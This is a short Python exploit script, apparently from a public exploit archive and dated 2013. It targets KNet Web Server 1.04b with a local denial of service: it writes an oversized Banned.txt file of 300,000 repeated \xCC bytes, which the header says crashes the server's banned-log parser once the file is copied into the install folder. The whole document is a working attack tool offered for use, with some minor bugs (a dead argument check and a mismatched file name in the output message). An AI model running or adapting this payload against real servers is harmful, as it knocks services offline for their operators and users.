|
#!/usr/bin/python
# Exploit Title : KNet Web Server 1.04b Local Denial Of Service
# Date : 6 Jun 2013
# Exploit Author : ne0z
# Vendor Homepage : http://www.hatsecure.com
# Version : KNet Web Server 1.04b
# Tested on : Windows XP Profesional SP3
# Windows XP Profesional SP2
# Windows 7 Ultimate
#
# Description :
# KNet Web Server have banned log with location C:\\Program Files\KNet\Banned.txt
# The parser of the banned log is vulnerable, when size of content in Banned.txt more than 200 KB
# and then KNet Web Server will crash.
#
# To generate Banned.txt just simple (Windows)
# $ python KNet_DOS_exploit.py C://
#
# Then move the file from C:\\Banned.txt to C:\\Program Files\KNet\Banned.txt
import sys, os
arg = sys.argv
if (len(arg) < 1):
print "KNet v1.04b - Local DOS exploit"
print "Usage : "
print "$ python "+arg[0]+" [PATH]"
print "Example : "
print "$ python "+arg[0]
sys.exit(0)
try:
print "[X] Generate payload"
d = open("Banned.txt","w")
payload = "\xCC" * 300000
d.write(payload)
d.close()
print "[X] Saved to Banner.txt"
except:
print "Error"
|